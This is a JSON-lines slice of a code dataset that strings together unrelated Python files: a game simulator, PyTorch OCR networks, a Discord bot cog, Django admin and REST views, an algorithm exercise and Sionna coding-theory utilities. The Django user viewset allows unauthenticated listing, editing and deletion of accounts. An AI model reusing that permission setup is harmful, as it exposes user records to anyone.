data=image)\n","repo_name":"HisAtri/CoverCover","sub_path":"mod/mulist.py","file_name":"mulist.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34354789905","text":"from two_player_game import TwoPlayerGame\n\nimport TicTacToe.config as config\nfrom TicTacToe.environment.board import TicTacToeBoard\n\n\nclass TicTacToe(TwoPlayerGame):\n\n def __init__(self, players):\n super(TicTacToe, self).__init__(players=players, config=config)\n\n self.player1.color = config.BLACK\n self.player2.color = config.WHITE\n\n for player in players:\n player.original_color = player.color\n\n def __run__(self, player1, player2):\n \"\"\"\n Runs an episode of the game\n\n :param player1:\n :param player2:\n :return: The original color of the winning player\n \"\"\"\n self.board = TicTacToeBoard()\n players = player1, player2\n\n while True:\n move = players[0].get_move(self.board.copy())\n self.board.apply_move(move, players[0].color)\n\n winner = self.board.game_won()\n if winner is not None:\n return config.get_label_from_winner_color(player1, player2, winner)\n\n players = list(reversed(players))\n\n def run_simulations(self, episodes, switch_colors=True, switch_players=True):\n \"\"\"\n Runs a number of games using the given players and returns statistics over all games run.\n\n\n If both :param switch_colors and :param switch_players are set, all four possible starting positions will iterated through.\n :param episodes: The number of games to run\n :param switch_colors: Flag specifying whether to alternate the players colors during play\n :param switch_players: Flag specifying whether to alternate the starting player\n :return: The results and average losses per episode where results is a list of the original colors of the winning player ([original_winning_color])\n \"\"\"\n\n simulation_players = [self.player1, self.player2]\n\n results = []\n losses = []\n\n for episode in range(episodes):\n if switch_colors and episode != 0 and episode % 2 == 0:\n simulation_players[0].color, simulation_players[1].color = simulation_players[1].color, simulation_players[0].color\n\n if switch_players and episode != 0 and episode + 1 % 2:\n simulation_players = list(reversed(simulation_players))\n\n winner = self.__run__(simulation_players[0], simulation_players[1])\n player_losses = []\n for player in simulation_players:\n loss = player.register_winner(winner)\n if loss is not None:\n player_losses.append(loss)\n\n losses += player_losses\n results.append(winner)\n\n for player in simulation_players:\n player.color = player.original_color\n\n return results, losses\n\n","repo_name":"masus04/Deep-Reinforcement-Learning-for-Boardgames","sub_path":"TicTacToe/environment/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"20471046236","text":"'''\nThe file holds the architecture of the models involved.\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n'''\nThe code of negative / positive sample character segmentation net\n'''\n\nclass BinaryClassNet(nn.Module):\n def __init__(self):\n super(BinaryClassNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 8, 5)\n self.conv2 = nn.Conv2d(8, 16, 5)\n self.conv3 = nn.Conv2d(16, 36, 5)\n self.fc1 = nn.Linear(36 * 2 * 2, 60)\n self.fc2 = nn.Linear(60, 30)\n self.fc3 = nn.Linear(30, 2)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(F.relu(self.conv3(x)), 2, 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\n'''\nThe architecture of classification of characters neural network\n'''\nclass ClassificationNet(nn.Module):\n\n def __init__(self):\n super(ClassificationNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(16 * 4 * 4, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 62)\n\n def forward(self, x):\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\ndef make_models():\n\n binclass = BinaryClassNet().double()\n binclass.load_state_dict(torch.load(\n \"D:\\Projects\\ArtifIQ\\channel_detection\\OCR\\Channel_Name_Num\\Back-end\\Saved_Model\\ClassificationNetCPU.pt\"))\n\n classNet = ClassificationNet().double()\n classNet.load_state_dict(torch.load(\n \"D:\\Projects\\ArtifIQ\\channel_detection\\OCR\\Channel_Name_Num\\Back-end\\Saved_Model\\MNISTNetCPU.pt\"))\n\n return (binclass, classNet)\n","repo_name":"rustagiadi95/OCR-sliding_window-pytorch","sub_path":"Processes/back-end/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31163408784","text":"import discord\nimport os\nimport datetime\nimport asyncio\nfrom discord.ext import commands, tasks\n\nclass Sinfo(commands.Cog, name=\"serverinfo\"):\n def __init__(self, client):\n self.client = client\n\n @commands.Cog.listener()\n async def on_ready(self):\n print('cogs loaded for serverinfo')\n\n\n @commands.command(aliases=['guildinfo'], usage='')\n @commands.guild_only()\n async def serverinfo(self, ctx, *, guild_id: int = None):\n if guild_id is not None and await self.client.is_owner(ctx.author):\n guild = self.client.get_guild(guild_id)\n if guild is None:\n return await ctx.send(f'Invalid Guild ID given.')\n else:\n guild = ctx.guild\n\n roles = [role.name.replace('@', '@\\u200b') for role in guild.roles]\n\n embed = discord.Embed(color = discord.Color.dark_magenta())\n embed.title = guild.name\n embed.add_field(name='ID', value=guild.id,inline=False)\n embed.add_field(name='Owner', value=guild.owner,inline=False)\n if guild.icon:\n embed.set_thumbnail(url=guild.icon_url)\n\n embed.add_field(name='Created', value=guild.created_at.strftime(\"%a, %#d %B %Y, %I:%M %p UTC\"),inline=False)\n embed.add_field(name='region', value=guild.region,inline=False)\n embed.add_field(name='server owner', value=guild.owner.name, inline=False)\n embed.add_field(name='owner status', value=guild.owner.status, inline=False)\n embed.add_field(name='Categories', value=len(guild.categories))\n embed.add_field(name='Text Channels', value=len(guild.text_channels))\n embed.add_field(name='Voice Channels', value=len(guild.voice_channels))\n embed.add_field(name='Emotes', value=len(guild.emojis) ,inline=False)\n \n embed.add_field(name='Roles', value=', '.join(roles) if len(roles) < 10 else f'{len(roles)} roles', inline=False)\n embed.set_footer(text=f\"requested by {ctx.author}\", icon_url=ctx.author.avatar_url)\n # e.set_footer(text='Created').timestamp = guild.created_at\n await ctx.send(embed=embed)\n\n\n\ndef setup(client):\n client.add_cog(Sinfo(client))","repo_name":"ChitogeOwO/Discordpy-Rewrite-Bot","sub_path":"cogs/serverinfo.py","file_name":"serverinfo.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2736527220","text":"import xadmin\nfrom xadmin.filters import manager\nfrom xadmin.filters import RelatedFieldListFilter\nfrom xadmin.layout import Row, Fieldset, Container\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom .models import Post, Category, Tag\nfrom .adminforms import PostAdminForm\nfrom blog.base_admin import BaseOwnerAdmin\n\n\nclass PostInline:\n form_layout = (\n Container(\n Row(\"title\", \"desc\"),\n )\n )\n extra = 1 # 控制额外多几个\n model = Post\n\n@xadmin.sites.register(Category)\nclass CategoryAdmin(BaseOwnerAdmin): # 分类\n # inlines = [PostInline, ]\n list_display = ('name', 'status', 'is_nav', 'created_time', 'post_count')\n fields = ('name', 'status', 'is_nav')\n\n def post_count(self, obj):\n return obj.post_set.count()\n\n post_count.short_description = '文章数量'\n\n@xadmin.sites.register(Tag)\nclass TagAdmin(BaseOwnerAdmin): # 便签\n list_display = ('name', 'status', 'created_time')\n fields = ('name', 'status')\n\n\nclass CategoryOwnerFilter(RelatedFieldListFilter):\n \"\"\"自定义过滤器只展示当前用户分类\"\"\"\n\n title = '分类过滤器'\n parameter_name = 'owner_category'\n\n def lookups(self, request, model_admin):\n return Category.objects.filter(owner=request.user).values_list('id', 'name')\n\n def queryset(self, request, queryset):\n category_id = self.value()\n if category_id:\n return queryset.filter(category_id=self.value())\n return queryset\n\n @classmethod\n def test(cls, field, request, params, model, admin_view, field_path):\n return field.name == 'category'\n\n def __init__(self, field, request, params, model, model_admin, field_path):\n super().__init__(field, request, params, model, model_admin, field_path)\n # 重新获取lookup_choices,才艮据owner过滤\n self.lookup_choices = Category.objects.filter(owner=request.user).values_list('id', 'name')\n\n\nmanager.register(CategoryOwnerFilter, take_priority=True)\n\n@xadmin.sites.register(Post)\nclass Postadmin(BaseOwnerAdmin): #编辑管理\n form = PostAdminForm\n list_display = [\n 'title', 'category', 'status',\n 'created_time', 'operator', 'owner'\n ]\n list_display_links = []\n\n list_filter = ['category']\n search_fields = ['title', 'category__name']\n\n actions_on_top = True\n actions_on_bottom = True\n\n #编辑页面\n save_on_top = True\n exclude = ('owner',)\n\n # fields = (\n # ('category', 'title'),\n # 'desc',\n # 'status',\n # 'content',\n # 'tag',\n # )\n form_layout = (\n Fieldset(\n '基础信息',\n Row(\"title\", \"category\"),\n 'status',\n 'tag',\n ),\n Fieldset(\n '内容信息',\n 'desc',\n 'content',\n 'is_md',\n 'content_ck',\n 'content_md',\n )\n )\n # fieldsets = (\n # ('基础配置', {\n # 'description': '基础配置描述',\n # 'fields': (\n # ('title', 'category'),\n # 'status',\n # ),\n # }),\n # ('内容', {\n # 'fields': (\n # 'desc',\n # 'content',\n # ),\n # }),\n # ('额外信息', {\n # 'classes': ('wide',),\n # 'fields': ('tag', ),\n # })\n # )\n\n def operator(self, obj):\n return format_html(\n '编辑',\n reverse('xadmin:myblog_post_change', args=(obj.id,))\n )\n operator.short_description = '操作'\n\n # def save_model(self, request, obj, form, change):\n # obj.owner = request.user\n # return super(Postadmin, self).save_model(request, obj, form, change)\n #\n # def get_queryset(self, request):\n # qs = super(Postadmin, self).get_queryset(request)\n # return qs.filter(owner=request.user)\n\n # @property\n # def media(self):\n # # xadmin基于Bootstrap,引入会导致页面样式冲突,这里只做演示\n # media = super().media\n # media.add_js(['https://cdn.bootcss.com/bootstrap/4.0.0-beta.2/js/bootstrap.bundle.js'])\n # media.add_css({\n # 'all': (\"https://cdn.bootcss.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css\", ),\n # })\n # return media\n\n# @xadmin.sites.register(LogEntry)\n# class LogEntryAdmin(BaseOwnerAdmin):\n# list_display = ['object_repr', 'object_id', 'action_flag', 'user', 'change_message']\n","repo_name":"wangjun-alt/Blog_Online","sub_path":"myblog/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25218772339","text":"from django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.db.models import Q\n\nfrom api.models import Pouzivatel, Sprava, Miestnost, Post\nfrom api.serializers import UserSerializer, MyTokenObtainPairSerializer, MessageSerializer, MiestnostSerializer, \\\n PostSerializer\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\nclass PouzivatelViewSet(viewsets.ModelViewSet):\n queryset = Pouzivatel.objects.all()\n serializer_class = UserSerializer\n\n # Add this code block\n def get_permissions(self):\n permission_classes = []\n if self.action == 'create':\n permission_classes = [AllowAny]\n elif self.action == 'retrieve' or self.action == 'update' or self.action == 'partial_update':\n permission_classes = [AllowAny]\n elif self.action == 'list' or self.action == 'destroy':\n permission_classes = [AllowAny]\n return [permission() for permission in permission_classes]\n\n\nclass SpravaViewSet(viewsets.ModelViewSet):\n queryset = Sprava.objects.all()\n serializer_class = MessageSerializer\n\n\ndef message_view(request, sender, receiver):\n if request.method == \"GET\":\n messages = Sprava.objects.filter(\n Q(odosielatel_id=sender, prijmatel_id=receiver) | Q(odosielatel_id=receiver, prijmatel_id=sender)).order_by(\"-timestamp\")[0:10]\n serializer = MessageSerializer(messages, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\ndef message_list(request, user):\n if request.method == \"GET\":\n messages = Sprava.objects.filter(Q(odosielatel_id=user) | Q(prijmatel_id=user)).order_by(\"-timestamp\")\n messagelist = list(messages)\n newmessagelist = []\n myid = user\n othersids = []\n for s in iter(messagelist):\n if myid != s.odosielatel_id and s.odosielatel_id not in othersids:\n othersids.append(s.odosielatel_id)\n if myid != s.prijmatel_id and s.prijmatel_id not in othersids:\n othersids.append(s.prijmatel_id)\n for i in iter(messagelist):\n if i.odosielatel_id in othersids:\n newmessagelist.append(i)\n othersids.remove(i.odosielatel_id)\n if i.prijmatel_id in othersids:\n newmessagelist.append(i)\n othersids.remove(i.prijmatel_id)\n if not newmessagelist:\n return JsonResponse({}, safe=False)\n for s in iter(newmessagelist):\n if myid == s.odosielatel_id:\n s.odosielatel_id = s.prijmatel_id\n else:\n s.prijmatel_id = s.odosielatel_id\n serializer = MessageSerializer(newmessagelist, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\nclass MiestnostViewSet(viewsets.ModelViewSet):\n queryset = Miestnost.objects.all()\n serializer_class = MiestnostSerializer\n\n\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\n\ndef posts_view(request, miestnost):\n if request.method == \"GET\":\n posts = Post.objects.filter(miestnost_id=miestnost).order_by('-timestamp')[0:10]\n serializer = PostSerializer(posts, many=True, context={'request': request})\n return JsonResponse(serializer.data, safe=False)\n\n\ndef logout_view(request):\n return HttpResponse('

    Logout

    ')\n","repo_name":"pego149/VaiiBackend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35668540015","text":"import sys\n\nn, s = map(int, sys.stdin.readline().split())\nlst = list(map(int, sys.stdin.readline().split()))\nsum = [0] * (n+1)\n\nfor i in range(1, n+1):\n sum[i] = sum[i-1] + lst[i-1]\n\nstart, end = 0, 1\nlength = []\n\nwhile start != n:\n if sum[end] - sum[start] >= s:\n if end - start < 1000001:\n length.append(end-start)\n start += 1\n\n else:\n if end != n:\n end += 1\n else:\n start += 1\n\nprint(min(length))","repo_name":"Rosa1026/baekjoon","sub_path":"1806.py","file_name":"1806.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70765852906","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Layer\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport warnings\nfrom importlib_resources import files, as_file\nfrom sionna.fec.ldpc import codes\nfrom sionna.utils import log2\nfrom sionna.nr.utils import generate_prng_seq as generate_prng_seq_utils\n\n\nclass GaussianPriorSource(Layer):\n r\"\"\"GaussianPriorSource(specified_by_mi=False, dtype=tf.float32, **kwargs)\n\n Generates `fake` LLRs as if the all-zero codeword was transmitted\n over an Bi-AWGN channel with noise variance ``no`` or mutual information\n (if ``specified_by_mi`` is True). If selected, the mutual information\n denotes the mutual information associated with a binary random variable\n observed at the output of a corresponding AWGN channel (cf. Gaussian\n approximation).\n\n .. image:: ../figures/GaussianPriorSource.png\n\n The generated LLRs are drawn from a Gaussian distribution with\n\n .. math::\n \\sigma_{\\text{llr}}^2 = \\frac{4}{\\sigma_\\text{ch}^2}\n\n and\n\n .. math::\n \\mu_{\\text{llr}} = \\frac{\\sigma_\\text{llr}^2}{2}\n\n where :math:`\\sigma_\\text{ch}^2` is the channel noise variance as defined by\n ``no``.\n\n If ``specified_by_mi`` is True, this class uses the of the so-called\n `J-function` (relates mutual information to Gaussian distributed LLRs) as\n proposed in [Brannstrom]_.\n\n Parameters\n ----------\n specified_by_mi : bool\n Defaults to False. If True, the second input parameter ``no`` is\n interpreted as mutual information instead of noise variance.\n\n dtype : tf.DType\n Defaults to `tf.float32`. Defines the datatype for internal\n calculations and the output. Must be one of the following\n `(tf.float16, tf.bfloat16, tf.float32, tf.float64)`.\n\n Input\n -----\n (output_shape, no):\n Tuple:\n\n output_shape : tf.int\n Integer tensor or Python array defining the shape of the desired\n output tensor.\n\n no : tf.float32\n Scalar defining the noise variance or mutual information (if\n ``specified_by_mi`` is True) of the corresponding (fake) AWGN\n channel.\n\n Output\n ------\n : ``dtype``, defaults to `tf.float32`\n 1+D Tensor with shape as defined by ``output_shape``.\n\n Raises\n ------\n InvalidArgumentError\n If mutual information is not in (0,1).\n\n AssertionError\n If ``inputs`` is not a list with 2 elements.\n\n \"\"\"\n\n def __init__(self, specified_by_mi=False, dtype=tf.float32, **kwargs):\n\n if dtype not in (tf.float16, tf.float32, tf.float64, tf.bfloat16,\n tf.complex64, tf.complex128):\n raise ValueError(\"Only float dtypes are supported.\")\n\n # use real_dtype to support tf.complex\n super().__init__(dtype=dtype.real_dtype, **kwargs)\n\n assert isinstance(specified_by_mi, bool),\"specified_by_mi must be bool.\"\n self._specified_by_mi = specified_by_mi\n\n def call(self, inputs):\n \"\"\"Generate Gaussian distributed fake LLRs as if the all-zero codeword\n was transmitted over an Bi-AWGN channel.\n\n Args:\n inputs (list): ``[output_shape, no]``, where\n ``output_shape`` (tf.int32): 1D list or tensor describing the\n desired shape of the output.\n ``no`` (tf.float32): Scalar defining the noise variance or mutual\n information (if ``specified_by_mi`` is True) of the\n corresponding (fake) AWGN channel.\n\n Returns:\n 1+D Tensor (``dtype``): Shape as defined by ``output_shape``.\n \"\"\"\n\n assert isinstance(inputs, (list, tuple)), \\\n \"inputs must be a list or tuple.\"\n assert len(inputs)==2, \"inputs must be a list with 2 elements.\"\n output_shape, noise_var = inputs\n\n if self._specified_by_mi:\n # interpret noise_var as mutual information\n mi_a = tf.cast(noise_var, tf.float32)\n tf.debugging.assert_greater_equal(mi_a, 0.,\n \"Mutual information must be positive.\")\n tf.debugging.assert_less_equal(mi_a, 1.,\n \"Mutual information must be less or equal 1.\")\n #clip Ia to range (0,1)\n mi_a = tf.maximum(mi_a, 1e-7)\n mi_a = tf.minimum(mi_a, 1.)\n mu_llr = j_fun_inv_tf(mi_a)\n sigma_llr = tf.math.sqrt(2*mu_llr)\n else:\n noise_var = tf.cast(noise_var, tf.float32)\n\n # noise_var must be positive\n noise_var = tf.maximum(noise_var, 1e-7)\n sigma_llr = tf.math.sqrt(4 / noise_var)\n mu_llr = sigma_llr**2 / 2\n\n mu_llr = tf.cast(mu_llr, super().dtype)\n sigma_llr = tf.cast(sigma_llr, super().dtype)\n\n # generate LLRs with Gaussian approximation (BPSK, all-zero cw)\n # Use negative mean as we generate logits with definition p(b=1)/p(b=0)\n llr = tf.random.normal(output_shape,\n mean=-1.*mu_llr,\n stddev=sigma_llr,\n dtype=super().dtype)\n return llr\n\ndef llr2mi(llr, s=None, reduce_dims=True):\n # pylint: disable=line-too-long\n r\"\"\"Implements an approximation of the mutual information based on LLRs.\n\n The function approximates the mutual information for given ``llr`` as\n derived in [Hagenauer]_ assuming an `all-zero codeword` transmission\n\n .. math::\n\n I \\approx 1 - \\sum \\operatorname{log_2} \\left( 1 + \\operatorname{e}^{-\\text{llr}} \\right).\n\n This approximation assumes that the following `symmetry condition` is fulfilled\n\n .. math::\n\n p(\\text{llr}|x=0) = p(\\text{llr}|x=1) \\cdot \\operatorname{exp}(\\text{llr}).\n\n For `non-all-zero` codeword transmissions, this methods requires knowledge\n about the signs of the original bit sequence ``s`` and flips the signs\n correspondingly (as if the all-zero codeword was transmitted).\n\n Please note that we define LLRs as :math:`\\frac{p(x=1)}{p(x=0)}`, i.e.,\n the sign of the LLRs differ to the solution in [Hagenauer]_.\n\n Input\n -----\n llr : tf.float32\n Tensor of arbitrary shape containing LLR-values.\n\n s : None or tf.float32\n Tensor of same shape as llr containing the signs of the\n transmitted sequence (assuming BPSK), i.e., +/-1 values.\n\n reduce_dims : bool\n Defaults to True. If True, all dimensions are\n reduced and the return is a scalar. Otherwise, `reduce_mean` is\n only taken over the last dimension.\n\n Output\n ------\n mi : tf.float32\n A scalar tensor (if ``reduce_dims`` is True) or a tensor of same\n shape as ``llr`` apart from the last dimensions that is removed.\n It contains the approximated value of the mutual information.\n\n Raises\n ------\n TypeError\n If dtype of ``llr`` is not a real-valued float.\n\n \"\"\"\n\n if s is None:\n s = tf.ones_like(llr)\n\n if llr.dtype not in (tf.float16, tf.bfloat16, tf.float32, tf.float64):\n raise TypeError(\"Dtype of llr must be a real-valued float.\")\n\n # ensure that both tensors are compatible\n s = tf.cast(s, llr.dtype)\n\n # scramble sign as if all-zero cw was transmitted\n llr_zero = tf.multiply(s, llr)\n llr_zero = tf.clip_by_value(llr_zero, -20., 20.) # clip for stability\n x = log2(1. + tf.exp(1.* llr_zero))\n if reduce_dims:\n x = 1. - tf.reduce_mean(x)\n else:\n x = 1. - tf.reduce_mean(x, axis=-1)\n return x\n\ndef j_fun(mu):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the `J-function` in NumPy.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mu : float\n float or `ndarray` of float.\n\n Output\n ------\n : float\n `ndarray` of same shape as the input.\n \"\"\"\n assert np.all(mu<1000), \"mu too large.\"\n # we support exact 0 for EXIT (clipping is used in any way)\n assert np.all(mu>-0.0001), \"mu must be positive.\"\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mu = np.maximum(mu, 1e-10) # input must be positive for numerical stability\n mi = (1-2**(-h1*(2*mu)**h2))**h3\n return mi\n\ndef j_fun_inv(mi):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the inverse `J-function` in NumPy.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mi : float\n float or `ndarray` of float.\n\n Output\n -------\n : float\n `ndarray` of same shape as the input.\n\n Raises\n ------\n AssertionError\n If ``mi`` < 0.001 or ``mi`` > 0.999.\n \"\"\"\n\n assert np.all(mi<0.999), \"mi must be smaller 1.\"\n assert np.all(mi>0.001), \"mi must be greater 0.\"\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mi = np.maximum(mi,1e-10)\n # add small value to avoid log(0)\n mu = 0.5*((-1/h1)*np.log2((1-mi**(1/h3)) + 1e-12))**(1/(h2))\n return np.minimum(mu, 20) # clipp the output to mu_max =20\n\ndef j_fun_tf(mu, verify_inputs=True):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the `J-function` in Tensorflow.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mu : tf.float32\n Tensor of arbitrary shape.\n\n verify_inputs : bool\n A boolean defaults to True. If True, ``mu`` is clipped internally\n to be numerical stable.\n\n Output\n ------\n : tf.float32\n Tensor of same shape and dtype as ``mu``.\n\n Raises\n ------\n InvalidArgumentError\n If ``mu`` is negative.\n \"\"\"\n assert isinstance(verify_inputs, bool), \"verify_inputs must be bool.\"\n if verify_inputs:\n # input must be positive for numerical stability\n mu = tf.maximum(mu, 1e-10)\n else:\n tf.debugging.assert_greater_equal(mu, 0., \"mu must be positive.\")\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mi = (1-2**(-h1*(2*mu)**h2))**h3\n return mi\n\ndef j_fun_inv_tf(mi, verify_inputs=True):\n # pylint: disable=line-too-long\n r\"\"\"Calculates the inverse `J-function` in Tensorflow.\n\n The so-called `J-function` relates mutual information to the mean of\n Gaussian distributed LLRs (cf. Gaussian approximation). We use the\n approximation as proposed in [Brannstrom]_ which can be written as\n\n .. math::\n\n J(\\mu) \\approx \\left( 1- 2^{H_\\text{1}(2\\mu)^{H_\\text{2}}}\\right)^{H_\\text{2}}\n\n with :math:`\\mu` denoting the mean value of the LLR distribution and\n :math:`H_\\text{1}=0.3073`, :math:`H_\\text{2}=0.8935` and\n :math:`H_\\text{3}=1.1064`.\n\n Input\n -----\n mi : tf.float32\n Tensor of arbitrary shape.\n\n verify_inputs : bool\n A boolean defaults to True. If True, ``mi`` is clipped internally\n to be numerical stable.\n\n Output\n ------\n : tf.float32\n Tensor of same shape and dtype as the ``mi``.\n\n Raises\n ------\n InvalidArgumentError\n If ``mi`` is not in `(0,1)`.\n \"\"\"\n\n assert isinstance(verify_inputs, bool), \"verify_inputs must be bool.\"\n if verify_inputs:\n # input must be positive for numerical stability\n mi = tf.maximum(mi, 1e-10) # ensure that I>0\n mi = tf.minimum(mi, 1.) # ensure that I=<1\n else:\n tf.debugging.assert_greater_equal(mi, 0., \"mi must be positive.\")\n tf.debugging.assert_less_equal(mi, 1., \"mi must be less or equal 1.\")\n\n h1 = 0.3073\n h2 = 0.8935\n h3 = 1.1064\n mu = 0.5*((-1/h1) * log2((1-mi**(1/h3))))**(1/(h2))\n return tf.minimum(mu, 20) # clipp the output to mu_max =20\n\ndef plot_trajectory(plot, mi_v, mi_c, ebno=None):\n \"\"\"Utility function to plot the trajectory of an EXIT-chart.\n\n Input\n -----\n plot : matplotlib.figure\n A handle to a matplotlib figure.\n\n mi_v : float\n An ndarray of floats containing the variable node mutual\n information.\n\n mi_c : float\n An ndarray of floats containing the check node mutual\n information.\n\n ebno : float\n A float denoting the EbNo in dB for the legend entry.\n \"\"\"\n\n assert (len(mi_v)==len(mi_c)), \"mi_v and mi_c must have same length.\"\n\n # number of decoding iterations to plot\n iters = np.shape(mi_v)[0] - 1\n\n x = np.zeros([2*iters])\n y = np.zeros([2*iters])\n\n # iterate between VN and CN MI value\n y[1] = mi_v[0]\n for i in range(1, iters):\n x[2*i] = mi_c[i-1]\n y[2*i] = mi_v[i-1]\n x[2*i+1] = mi_c[i-1]\n y[2*i+1] = mi_v[i]\n\n if ebno is not None:\n label_str = f\"Actual trajectory @ {ebno} dB\"\n else:\n label_str = \"Actual trajectory\"\n\n #plot trajectory\n plot.plot(x,\n y,\n \"-\",\n linewidth=3,\n color=\"g\",\n label=label_str)\n plot.legend(fontsize=18) # and show the legend\n\ndef plot_exit_chart(mi_a=None, mi_ev=None, mi_ec=None, title=\"EXIT-Chart\"):\n \"\"\"Utility function to plot EXIT-Charts [tenBrinkEXIT]_.\n\n If all inputs are `None` an empty EXIT chart is generated. Otherwise,\n the mutual information curves are plotted.\n\n Input\n -----\n mi_a : float\n An ndarray of floats containing the a priori mutual\n information.\n\n mi_v : float\n An ndarray of floats containing the variable node mutual\n information.\n\n mi_c : float\n An ndarray of floats containing the check node mutual\n information.\n\n title : str\n A string defining the title of the EXIT chart.\n Output\n ------\n plt: matplotlib.figure\n A matplotlib figure handle\n\n Raises\n ------\n AssertionError\n If ``title`` is not `str`.\n \"\"\"\n\n assert isinstance(title, str), \"title must be str.\"\n\n if not (mi_ev is None and mi_ec is None):\n if mi_a is None:\n raise ValueError(\"mi_a cannot be None if mi_e is provided.\")\n\n if mi_ev is not None:\n assert (len(mi_a)==len(mi_ev)), \"mi_a and mi_ev must have same length.\"\n if mi_ec is not None:\n assert (len(mi_a)==len(mi_ec)), \"mi_a and mi_ec must have same length.\"\n\n plt.figure(figsize=(10,10))\n plt.title(title, fontsize=25)\n plt.xlabel(\"$I_{a}^v$, $I_{e}^c$\", fontsize=25)\n plt.ylabel(\"$I_{e}^v$, $I_{a}^c$\", fontsize=25)\n plt.grid(visible=True, which='major')\n\n\n # for MI, the x,y limits are always (0,1)\n plt.xlim(0, 1)\n plt.ylim(0, 1)\n plt.xticks(fontsize=18)\n plt.yticks(fontsize=18)\n\n # and plot EXIT curves\n if mi_ec is not None:\n plt.plot(mi_ec, mi_a, \"r\", linewidth=3, label=\"Check node\")\n plt.legend()\n if mi_ev is not None:\n plt.plot(mi_a, mi_ev, \"b\", linewidth=3, label=\"Variable node\")\n plt.legend()\n return plt\n\ndef get_exit_analytic(pcm, ebno_db):\n \"\"\"Calculate the analytic EXIT-curves for a given parity-check matrix.\n\n This function extracts the degree profile from ``pcm`` and calculates the\n variable (VN) and check node (CN) decoder EXIT curves. Please note that\n this is an asymptotic tool which needs a certain codeword length for\n accurate predictions.\n\n Transmission over an AWGN channel with BPSK modulation and SNR ``ebno_db``\n is assumed. The detailed 